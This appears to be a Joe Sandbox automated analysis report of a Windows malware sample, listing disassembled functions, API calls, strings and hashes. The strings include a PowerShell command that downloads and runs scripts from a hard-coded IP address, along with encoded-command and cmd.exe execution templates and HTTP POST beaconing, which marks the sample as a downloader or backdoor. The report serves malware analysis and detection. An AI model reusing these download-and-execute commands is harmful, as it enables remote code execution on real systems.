Part of subcall function 01096810: ObtainUserAgentString.URLMON(00000000,?,01099388), ref: 01096832
Part of subcall function 01096810: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000), ref: 01096852
Part of subcall function 01096810: InternetOpenW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 010968B8
Part of subcall function 01096810: InternetSetOptionW.WININET(00000000,00000002,0000EA60,00000004), ref: 010968FB
Part of subcall function 01096810: InternetConnectW.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 01096918
Part of subcall function 01096810: HttpOpenRequestW.WININET(00000000,POST,?,00000000,00000000,00000000,80403000,00000000), ref: 01096951
Part of subcall function 01096810: InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 0109697A

Sleep.KERNEL32(00000000), ref: 01098166
lstrcmpA.KERNEL32(00000000,INIT), ref: 01098173
StrToIntA.SHLWAPI(00000000), ref: 01098236
StrToIntA.SHLWAPI(00000000), ref: 0109827B
GetSystemDirectoryW.KERNEL32(?,00000104), ref: 010982B7
PathCombineW.SHLWAPI(?,?,WindowsPowerShell\v1.0\powershell.exe), ref: 010982D0
wnsprintfW.SHLWAPI ref: 010982E4
ExpandEnvironmentStringsW.KERNEL32(%ComSpec%,?,00000104), ref: 01098320
wnsprintfW.SHLWAPI ref: 01098334

Part of subcall function 01095760: GetProcessHeap.KERNEL32(00000000,00000000,01098685), ref: 01095767
Part of subcall function 01095760: HeapFree.KERNEL32(00000000), ref: 0109576E

GetModuleHandleA.KERNEL32(kernel32), ref: 01098357
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 01098365
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 0109837A
LoadLibraryA.KERNEL32(shell32,ShellExecuteW), ref: 010983DB
GetProcAddress.KERNEL32(00000000), ref: 010983E2
wsprintfA.USER32 ref: 01098442
wnsprintfA.SHLWAPI ref: 0109846E

Part of subcall function 01092940: GetProcessHeap.KERNEL32(00000008,?), ref: 01092952
Part of subcall function 01092940: HeapAlloc.KERNEL32(00000000), ref: 01092959

Sleep.KERNEL32(00000000), ref: 01098696

Strings

INIT, xrefs: 0109816D
-enc %S, xrefs: 010982DA
%d|%s|%.16s|, xrefs: 0109843C
WindowsPowerShell\v1.0\powershell.exe, xrefs: 010982BD
open, xrefs: 010983F0
shell32, xrefs: 010983D6
%d|%s, xrefs: 01098100
Wow64RevertWow64FsRedirection, xrefs: 0109836B
ShellExecuteW, xrefs: 010983D1
%ComSpec%, xrefs: 0109831B
/c %S, xrefs: 0109832A
Wow64DisableWow64FsRedirection, xrefs: 0109835F
%s|%s, xrefs: 01098464
kernel32, xrefs: 01098344

Memory Dump Source

Source File: 00000000.00000002.1809524488.0000000001091000.00000020.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true

Associated: 00000000.00000002.1809497333.0000000001090000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1809558628.000000000109B000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1090000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: HeapInternet$AddressProcwnsprintf$OpenOptionProcessSleepwsprintf$AgentAllocByteCharCombineConnectCount64DirectoryEnvironmentExpandFreeHandleHttpLibraryLoadModuleMultiObtainPathQueryRequestStringStringsSystemTickUserWidelstrcmp
String ID: -enc %S$ /c %S$%ComSpec%$%d|%s$%d|%s|%.16s|$%s|%s$INIT$ShellExecuteW$WindowsPowerShell\v1.0\powershell.exe$Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32$open$shell32
API String ID: 1920831074-1153165106
Opcode ID: ef56443332e923c265a6e437422752ed76abe527811c9aa613d63f6811415dbd
Instruction ID: c34ac73016c69ac49c76c296aaa9ac91bbc493ed598a0c1ce701d7677873a7c2
Opcode Fuzzy Hash: ef56443332e923c265a6e437422752ed76abe527811c9aa613d63f6811415dbd
Instruction Fuzzy Hash: A6C1E871E00209ABCF14EBB5DCB4AEEB7B5BF54710F00405AE585AB384EB759E04DB90

Function 01096810 Relevance: 52.7, APIs: 27, Strings: 3, Instructions: 229
memorynetworkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ObtainUserAgentString.URLMON(00000000,?,01099388), ref: 01096832
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000), ref: 01096852
GetProcessHeap.KERNEL32(00000008,00000000), ref: 0109686B
HeapAlloc.KERNEL32(00000000), ref: 01096872
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000), ref: 01096893
InternetOpenW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 010968B8
InternetSetOptionW.WININET(00000000,00000002,0000EA60,00000004), ref: 010968FB
InternetConnectW.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 01096918
HttpOpenRequestW.WININET(00000000,POST,?,00000000,00000000,00000000,80403000,00000000), ref: 01096951
InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 0109697A
InternetSetOptionW.WININET(00000000,0000001F,00003180,00000004), ref: 01096994
HttpSendRequestW.WININET(00000000,Content-Type: application/octet-streamContent-Encoding: binary,000000FF,?,0000EA60), ref: 010969A8
InternetQueryDataAvailable.WININET(00000000,00000000,00000000,00000000), ref: 010969C4
GetProcessHeap.KERNEL32(00000008,00000000), ref: 010969DA
HeapAlloc.KERNEL32(00000000), ref: 010969E1
GetProcessHeap.KERNEL32(00000008,00000000,00000000), ref: 010969EC
HeapReAlloc.KERNEL32(00000000), ref: 010969F3
InternetReadFile.WININET(00000000,00000000,00000000,00000000), ref: 01096A07
InternetCloseHandle.WININET(00000000), ref: 01096A29
InternetCloseHandle.WININET(00000000), ref: 01096A34
InternetCloseHandle.WININET(00000000), ref: 01096A3A
GetProcessHeap.KERNEL32(00000000,?), ref: 01096A6D
HeapFree.KERNEL32(00000000), ref: 01096A70
GetProcessHeap.KERNEL32(00000000,?), ref: 01096A7C
HeapFree.KERNEL32(00000000), ref: 01096A7F
GetProcessHeap.KERNEL32(00000000,?), ref: 01096A8B
HeapFree.KERNEL32(00000000), ref: 01096A8E

Strings

`, xrefs: 010968CB
Content-Type: application/octet-streamContent-Encoding: binary, xrefs: 010969A2
POST, xrefs: 0109694B

Memory Dump Source

Source File: 00000000.00000002.1809524488.0000000001091000.00000020.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true

Associated: 00000000.00000002.1809497333.0000000001090000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1809558628.000000000109B000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1090000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: Heap$Internet$Process$AllocCloseFreeHandleOption$ByteCharHttpMultiOpenQueryRequestWide$AgentAvailableConnectDataFileObtainReadSendStringUser
String ID: Content-Type: application/octet-streamContent-Encoding: binary$POST$`
API String ID: 2744214989-3343008755
Opcode ID: 21b623fd7ac1fb9717cde2cfa1e247f355f9791d4e94acf2a77cb5b6decf9409
Instruction ID: 62f64e496b7667809ab51c7ba9acfe450722752adfeace51ee7f9135796af292
Opcode Fuzzy Hash: 21b623fd7ac1fb9717cde2cfa1e247f355f9791d4e94acf2a77cb5b6decf9409
Instruction Fuzzy Hash: 3A71B2B1A40219ABEF209BA5DC59FAE7BBCFF04710F140159FA51F7280DB7599009B64

Function 00153670 Relevance: 42.4, APIs: 4, Strings: 20, Instructions: 354
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 001531C0: task.LIBCPMTD ref: 001532A1
Part of subcall function 001531C0: task.LIBCPMTD ref: 001532B0

task.LIBCPMTD ref: 00153748

Part of subcall function 00153410: task.LIBCPMTD ref: 0015342D
Part of subcall function 00153410: task.LIBCPMTD ref: 00153435
Part of subcall function 00153410: task.LIBCPMTD ref: 0015343D

Part of subcall function 00153450: task.LIBCPMTD ref: 00153522
Part of subcall function 00153450: task.LIBCPMTD ref: 00153531

Part of subcall function 00153640: task.LIBCPMTD ref: 00153653

Part of subcall function 00152A80: task.LIBCPMTD ref: 00152A8A

Part of subcall function 00152B80: task.LIBCPMTD ref: 00152C4A
Part of subcall function 00152B80: task.LIBCPMTD ref: 00152C59

task.LIBCPMTD ref: 001538A7

Part of subcall function 00152D00: task.LIBCPMTD ref: 00152D8B
Part of subcall function 00152D00: task.LIBCPMTD ref: 00152D97
Part of subcall function 00152D00: task.LIBCPMTD ref: 00152DA3
Part of subcall function 00152D00: task.LIBCPMTD ref: 00152DB2

Part of subcall function 00151BC0: task.LIBCPMTD ref: 00151CB3
Part of subcall function 00151BC0: task.LIBCPMTD ref: 00151CC2

Part of subcall function 00151DD0: task.LIBCPMTD ref: 00151E73
Part of subcall function 00151DD0: task.LIBCPMTD ref: 00151E82

Part of subcall function 00151FE0: task.LIBCPMTD ref: 00152065
Part of subcall function 00151FE0: task.LIBCPMTD ref: 00152074

Part of subcall function 001521D0: task.LIBCPMTD ref: 001522AD
Part of subcall function 001521D0: task.LIBCPMTD ref: 001522BC

task.LIBCPMTD ref: 00153B39

Part of subcall function 001527E0: task.LIBCPMTD ref: 00152805

task.LIBCPMTD ref: 00153BD3

Strings

kiaoobdghby, xrefs: 00153928
xnolhfqebbnrgeazvflldahutuuqsgqykleatodisqmzdvbalgus, xrefs: 00153B46
erlehkqeoafjbbakngeamygibfibycnzoxdforwfarpfohjilxvtqpjhokuhneptpradfswisqtlicj, xrefs: 00153773
mszimdsmagcsvicmxoepfxhbkeaeo, xrefs: 001537C6
hwlbdurvyvvqldatflklohusonaqpzyyypeogrlsqivrfmncjpytgjrvdojhcszsnyfnrzawzrhb, xrefs: 001536D4
qwqygrhgjnlaslbxrtpkmtdkuotavmzczxrpxcrwtsmbsjlrxtrernmpidlygcejepskuuax, xrefs: 001537F2
qdgrecqxaamyajazrwulmwar, xrefs: 001536A3
bgwayqjocvuljtzygwhgunsoeayvlexsooubzvltluxjsxepesiiyrsulnbbmvdoze, xrefs: 00153A65
lypanvubxxcyflbridlqlwfpuobrhtkfaezqbqqgqatvjqttkwfgnihfgahkdazhgbiobfwxbdqur, xrefs: 00153A37
cct, xrefs: 00153BA3
jlwhzwxcgwxeqybcsimiysboffbjhvvezemcirfkbg, xrefs: 00153813
pfytwtrjvw, xrefs: 001538E7
wmjkzdvgppomvnsashxqdbacmylifgmxhbtqsqswhznyf, xrefs: 001538CB
eayhpemxuutcdhjelpkfaiddjsblupzguucsjdwrhyqfvqahegmpewibrwjckldgxuwebokbvp, xrefs: 00153B7F
auflmecuefrwdklytrcnktmoa, xrefs: 001539A6
gvnzsipipcghsiqztwv, xrefs: 0015378C
mwwmnyrbpxfpxjumsjlgssbxzxlncpuuhqqfqubyiwnlmenhguxbklwzqksybicmwyiuxzuesoaeeyphcvwrprhqsvetlce, xrefs: 00153946
nifwxqeymajpfnuvadyfsnxaotjoosfbtarwsxjgymiautkdtuhcyuvwolhqwuiwfzovgmpyzzdzptdmlxywmmmznckxkgrsxp, xrefs: 001539C2
pdhbkyhzkmcfitopomizjflnklirmfrrzkmwtaywnbldpzvwnxwmu, xrefs: 00153757
uxxztqzgwwuzqaevnavsfydrh, xrefs: 00153900

Memory Dump Source

Source File: 00000000.00000002.1809213854.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true

Associated: 00000000.00000002.1809177937.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1809248092.0000000000163000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1809275823.000000000016B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1809296320.000000000016D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_150000_SecuriteInfo.jbxd

Similarity

API ID: task
String ID: auflmecuefrwdklytrcnktmoa$bgwayqjocvuljtzygwhgunsoeayvlexsooubzvltluxjsxepesiiyrsulnbbmvdoze$cct$eayhpemxuutcdhjelpkfaiddjsblupzguucsjdwrhyqfvqahegmpewibrwjckldgxuwebokbvp$erlehkqeoafjbbakngeamygibfibycnzoxdforwfarpfohjilxvtqpjhokuhneptpradfswisqtlicj$gvnzsipipcghsiqztwv$hwlbdurvyvvqldatflklohusonaqpzyyypeogrlsqivrfmncjpytgjrvdojhcszsnyfnrzawzrhb$jlwhzwxcgwxeqybcsimiysboffbjhvvezemcirfkbg$kiaoobdghby$lypanvubxxcyflbridlqlwfpuobrhtkfaezqbqqgqatvjqttkwfgnihfgahkdazhgbiobfwxbdqur$mszimdsmagcsvicmxoepfxhbkeaeo$mwwmnyrbpxfpxjumsjlgssbxzxlncpuuhqqfqubyiwnlmenhguxbklwzqksybicmwyiuxzuesoaeeyphcvwrprhqsvetlce$nifwxqeymajpfnuvadyfsnxaotjoosfbtarwsxjgymiautkdtuhcyuvwolhqwuiwfzovgmpyzzdzptdmlxywmmmznckxkgrsxp$pdhbkyhzkmcfitopomizjflnklirmfrrzkmwtaywnbldpzvwnxwmu$pfytwtrjvw$qdgrecqxaamyajazrwulmwar$qwqygrhgjnlaslbxrtpkmtdkuotavmzczxrpxcrwtsmbsjlrxtrernmpidlygcejepskuuax$uxxztqzgwwuzqaevnavsfydrh$wmjkzdvgppomvnsashxqdbacmylifgmxhbtqsqswhznyf$xnolhfqebbnrgeazvflldahutuuqsgqykleatodisqmzdvbalgus
API String ID: 1384045349-3352526687
Opcode ID: 521c3bc11b47c74059ee4d5a32ee945867246cd9de91e7bd4a2583ec563d9980
Instruction ID: 345e67aa5a2d552ac22bad071a3ddcbc45a66e564dd5a944fbdd731be5150cc2
Opcode Fuzzy Hash: 521c3bc11b47c74059ee4d5a32ee945867246cd9de91e7bd4a2583ec563d9980
Instruction Fuzzy Hash: 64E12A70E50B08AAD701FF78CD127AEBB75AB16B41F404319F8653F5C1EBB116988B92

Function 001523F0 Relevance: 35.2, APIs: 13, Strings: 7, Instructions: 215COMMON

Download Yara Rule

APIs

task.LIBCPMTD ref: 0015252A
task.LIBCPMTD ref: 00152539

Strings

gjeerdbceuzsmkxmsxiomvcavimwsztwserhzklmfwksvuzqomelhhgekpjekv, xrefs: 0015244F, 001524CC, 001524F2, 00152616, 0015263C
cghngzwziwanmbszqlbunzalhundohfsmgyjluxqyswlptwwjdpgxtza, xrefs: 0015246A
ayufwgulvuygbab, xrefs: 00152760
S, xrefs: 00152549
duokwoniipliaktpcumxirsegoopnpgqtpzdmrgqunqsuxltfargaoyfbibqgre, xrefs: 0015242B, 00152571, 00152597
hczcjatmoheclnpwaqmeqzj, xrefs: 0015247E, 001526BB, 001526E1
xkmhkueozjyetdrqi, xrefs: 0015248F

Memory Dump Source

Source File: 00000000.00000002.1809213854.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true

Associated: 00000000.00000002.1809177937.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1809248092.0000000000163000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1809275823.000000000016B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1809296320.000000000016D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_150000_SecuriteInfo.jbxd

Similarity

API ID: task
String ID: S$ayufwgulvuygbab$cghngzwziwanmbszqlbunzalhundohfsmgyjluxqyswlptwwjdpgxtza$duokwoniipliaktpcumxirsegoopnpgqtpzdmrgqunqsuxltfargaoyfbibqgre$gjeerdbceuzsmkxmsxiomvcavimwsztwserhzklmfwksvuzqomelhhgekpjekv$hczcjatmoheclnpwaqmeqzj$xkmhkueozjyetdrqi
API String ID: 1384045349-3540177847
Opcode ID: 487f03bd8506d70ab22948f2653de13435b742baf74a5ba1085fad46ac94e163
Instruction ID: 8fe6604260027fec9804693b2f095d5f9425b9018393694a9f16cd3638bd88fe
Opcode Fuzzy Hash: 487f03bd8506d70ab22948f2653de13435b742baf74a5ba1085fad46ac94e163
Instruction Fuzzy Hash: BDB13671904268CEDB24DB64CD51BDDBBB0AB22345F1081DAE8697B282DB705F88DF61

Function 010988C0 Relevance: 28.1, APIs: 8, Strings: 8, Instructions: 69stringCOMMON

Download Yara Rule

APIs

ExpandEnvironmentStringsW.KERNEL32(%SYSTEMROOT%\Microsoft.NET\Framework\v4.0.30319\csc.exe,?,00000104), ref: 010988E1
ExpandEnvironmentStringsW.KERNEL32(%SYSTEMROOT%\Microsoft.NET\Framework\v2.0.50727\csc.exe,?,00000104), ref: 010988F4
ExpandEnvironmentStringsW.KERNEL32(%ComSpec%,?,00000104), ref: 01098907
GetFileAttributesW.KERNEL32(?), ref: 0109892D
GetFileAttributesW.KERNEL32(?), ref: 01098946
lstrcpyW.KERNEL32(00000000,sd4.ps1), ref: 0109895D
wnsprintfW.SHLWAPI ref: 01098980
ShellExecuteW.SHELL32(00000000,open,?,?,00000000,00000000), ref: 010989A2

Strings

%ComSpec%, xrefs: 01098902
%SYSTEMROOT%\Microsoft.NET\Framework\v2.0.50727\csc.exe, xrefs: 010988EF
sd4.ps1, xrefs: 01098951
%SYSTEMROOT%\Microsoft.NET\Framework\v4.0.30319\csc.exe, xrefs: 010988DC
open, xrefs: 0109899B
http://217.195.153.196/assets, xrefs: 0109896A
sd2.ps1, xrefs: 01098938
/c "powershell -command IEX(IWR -UseBasicParsing '%s/%s')", xrefs: 0109896F

Memory Dump Source

Source File: 00000000.00000002.1809524488.0000000001091000.00000020.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true

Associated: 00000000.00000002.1809497333.0000000001090000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1809558628.000000000109B000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1090000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: EnvironmentExpandStrings$AttributesFile$ExecuteShelllstrcpywnsprintf
String ID: %ComSpec%$%SYSTEMROOT%\Microsoft.NET\Framework\v2.0.50727\csc.exe$%SYSTEMROOT%\Microsoft.NET\Framework\v4.0.30319\csc.exe$/c "powershell -command IEX(IWR -UseBasicParsing '%s/%s')"$http://217.195.153.196/assets$open$sd2.ps1$sd4.ps1
API String ID: 4132772799-332074121
Opcode ID: 280bae9d71075ed566a3d57da415f46b688ce8bd8cf11a7e6ff36d0a15b7652a
Instruction ID: b9d71f712433895a9b2fe92f2274d9b34d9d2521eb3601ecd5931929645ea3ae
Opcode Fuzzy Hash: 280bae9d71075ed566a3d57da415f46b688ce8bd8cf11a7e6ff36d0a15b7652a
Instruction Fuzzy Hash: 1B212771A4021D6BEF20D6949C65FEA77ACFB05724F4401D6F6D8E60C0E7B05A848F91

Function 01095830 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 167memorypipeprocessCOMMON

Download Yara Rule

APIs

CreatePipe.KERNEL32(?,?,?,00000000), ref: 01095863
CreateProcessW.KERNEL32(?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 010958C1
CloseHandle.KERNEL32(?,?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 010958D4
CloseHandle.KERNEL32(?,?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 010958D9
WaitForSingleObject.KERNEL32(00000000,0000EA60,?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 010958F0
PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 01095907
ReadFile.KERNEL32(?,?,?,?,00000000,?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 01095944
GetProcessHeap.KERNEL32(00000008,?,?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 0109596F
HeapAlloc.KERNEL32(00000000,?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 01095972
GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 0109597D
HeapReAlloc.KERNEL32(00000000,?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 01095980
PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 010959D7
CloseHandle.KERNEL32(?,?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 010959F3
CloseHandle.KERNEL32(00000000,?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 010959F8

Strings

D, xrefs: 01095886

Memory Dump Source

Source File: 00000000.00000002.1809524488.0000000001091000.00000020.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true

Associated: 00000000.00000002.1809497333.0000000001090000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1809558628.000000000109B000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1090000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: CloseHandleHeap$PipeProcess$AllocCreateNamedPeek$FileObjectReadSingleWait
String ID: D
API String ID: 2337985897-2746444292
Opcode ID: 7e058b8b4c540d43173d6c011386096069d721f9c42c223a641b07c16a87ac66
Instruction ID: 369a0fdfaaf85e3071ebd5b74806e411aa45879c2756ccfb36394fc7d679ab54
Opcode Fuzzy Hash: 7e058b8b4c540d43173d6c011386096069d721f9c42c223a641b07c16a87ac66
Instruction Fuzzy Hash: E651A171A00219AFEF218BA5EC55FAEBFB8FB44720F144066EA95F7280D77598048B60

Function 001531C0 Relevance: 26.4, APIs: 7, Strings: 8, Instructions: 147COMMON

Download Yara Rule

APIs

task.LIBCPMTD ref: 001532A1
task.LIBCPMTD ref: 001532B0

Strings

mvfhugfzhjaxvbknnhrjilxlfyzwtcfeenffipnrifprrliuzcjwulczesnckfzhjp, xrefs: 001531F8
D, xrefs: 00153394
7, xrefs: 001532E2
Q, xrefs: 00153307
*, xrefs: 001532BD
zaiptbmxvlxmaeyxfahlfgzodoaaorzwxdwlcbbswmzrxpgsvwdogtygmxrtlyfffezpl, xrefs: 0015321D, 00153258, 00153275, 00153323, 00153343
wgn, xrefs: 001533B0
wcgwprfuhsreihulyoxaptokhjbbumrzzfonukijjmhyytfdjnxxratsclpujhtohnz, xrefs: 0015320C

Memory Dump Source

Source File: 00000000.00000002.1809213854.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true

Associated: 00000000.00000002.1809177937.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1809248092.0000000000163000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1809275823.000000000016B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1809296320.000000000016D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_150000_SecuriteInfo.jbxd

Similarity

API ID: task
String ID: *$7$D$Q$mvfhugfzhjaxvbknnhrjilxlfyzwtcfeenffipnrifprrliuzcjwulczesnckfzhjp$wcgwprfuhsreihulyoxaptokhjbbumrzzfonukijjmhyytfdjnxxratsclpujhtohnz$wgn$zaiptbmxvlxmaeyxfahlfgzodoaaorzwxdwlcbbswmzrxpgsvwdogtygmxrtlyfffezpl
API String ID: 1384045349-950991828
Opcode ID: 3053f1cef34d9f3cdb2f2a4e6172ad1d3b3356925305e2336dd32a0a48922db1
Instruction ID: dbce17ab19906fe69e73fb5335e66b75bbfc5dd51bf1d238dd08b6c5cdcdebb9
Opcode Fuzzy Hash: 3053f1cef34d9f3cdb2f2a4e6172ad1d3b3356925305e2336dd32a0a48922db1
Instruction Fuzzy Hash: 32613770D04258DFDB15DFA8C8557EDBBB0BB14345F108299E82ABF281DB705A88DF90

Function 010963F0 Relevance: 25.6, APIs: 17, Instructions: 148networkmemoryCOMMON

Download Yara Rule

APIs

inet_pton.WS2_32(00000002,?,?), ref: 01096410
htons.WS2_32(?), ref: 0109642C
inet_pton.WS2_32(00000002,?,?), ref: 0109643E
htons.WS2_32(?), ref: 01096445
socket.WS2_32(00000002,00000001,00000006), ref: 01096458
connect.WS2_32(00000000,?,00000010), ref: 01096473
socket.WS2_32(00000002,00000001,00000006), ref: 01096486
connect.WS2_32(00000000,?,00000010), ref: 0109649B
closesocket.WS2_32(00000000), ref: 010964A3
select.WS2_32(00000000,?), ref: 010964D8
recv.WS2_32(?,?,00000400,00000000), ref: 01096514
send.WS2_32(00000000,?,00000000,00000000), ref: 0109653A
select.WS2_32(00000000,00000002,00000000,00000000,00000000), ref: 0109656C
closesocket.WS2_32(00000000), ref: 01096586
closesocket.WS2_32(00000000), ref: 0109658D
GetProcessHeap.KERNEL32(00000000,?), ref: 01096599
HeapFree.KERNEL32(00000000), ref: 010965A0

Memory Dump Source

Source File: 00000000.00000002.1809524488.0000000001091000.00000020.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true

Associated: 00000000.00000002.1809497333.0000000001090000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1809558628.000000000109B000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1090000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: closesocket$Heapconnecthtonsinet_ptonselectsocket$FreeProcessrecvsend
String ID:
API String ID: 2202494921-0
Opcode ID: 52f6b9aa7637d2ddf08d789fb91af8220a29baa905c33c94a37493a0facf8783
Instruction ID: 12a3da512e38f270852391e570da06b3d7b6595f5f8059170ef86a5c652b5ee8
Opcode Fuzzy Hash: 52f6b9aa7637d2ddf08d789fb91af8220a29baa905c33c94a37493a0facf8783
Instruction Fuzzy Hash: 3951AFB1104304ABD7209F64DC99F6EB7ECBF88B24F400A19FA95971D1C7B5D9058BA2

Function 001521D0 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 140COMMON

Download Yara Rule

APIs

task.LIBCPMTD ref: 001522AD
task.LIBCPMTD ref: 001522BC
task.LIBCPMTD ref: 0015232E
task.LIBCPMTD ref: 0015233D

Strings

6, xrefs: 00152394
xwsxrlmzs, xrefs: 00152213, 001522E5, 00152302
E, xrefs: 001522C9
d, xrefs: 0015234A
dsjeagbelkgqcwpmepfckbptdwhhxxjtlspkxngcfukuyvsbhwvhrzguybcubpflwcttrjukrdntfebinbhhiaqsgnumfjvx, xrefs: 00152253, 00152264, 00152281
Z, xrefs: 0015236F

Memory Dump Source

Source File: 00000000.00000002.1809213854.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true

Associated: 00000000.00000002.1809177937.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1809248092.0000000000163000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1809275823.000000000016B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1809296320.000000000016D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_150000_SecuriteInfo.jbxd

Similarity

API ID: task
String ID: 6$E$Z$d$dsjeagbelkgqcwpmepfckbptdwhhxxjtlspkxngcfukuyvsbhwvhrzguybcubpflwcttrjukrdntfebinbhhiaqsgnumfjvx$xwsxrlmzs
API String ID: 1384045349-1131196702
Opcode ID: 7c5b3e0ecea4f5311898b973eb9cc39ee11d7d8c40f688d4adeb241590f0b067
Instruction ID: 05333ddef7ade9087382670edc2deba38d4977b54479297a99fb6267df3b1c63
Opcode Fuzzy Hash: 7c5b3e0ecea4f5311898b973eb9cc39ee11d7d8c40f688d4adeb241590f0b067
Instruction Fuzzy Hash: 45517871D04298CECB14CFE8C9407EDBBB0BF16345F10815AD8257F282DBB95A89DB51

Function 00151DD0 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 140COMMON

Download Yara Rule

APIs

task.LIBCPMTD ref: 00151E73
task.LIBCPMTD ref: 00151E82

Strings

=J, xrefs: 00151F8C
W, xrefs: 00151E8F
&, xrefs: 00151F70
6, xrefs: 00151ECF
+, xrefs: 00151EAF

Memory Dump Source

Source File: 00000000.00000002.1809213854.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true

Associated: 00000000.00000002.1809177937.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1809248092.0000000000163000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1809275823.000000000016B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1809296320.000000000016D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_150000_SecuriteInfo.jbxd

Similarity

API ID: task
String ID: &$+$6$=J$W
API String ID: 1384045349-2096352046
Opcode ID: e13c7f3bcb2f92791cf94e71d91e99330fb28b7f6862888e8397dbfe8539cfff
Instruction ID: 67e63a657642a89b7d29519d1b45b55dbcfaeb2aa3ecbf456d19010a4d62c368
Opcode Fuzzy Hash: e13c7f3bcb2f92791cf94e71d91e99330fb28b7f6862888e8397dbfe8539cfff
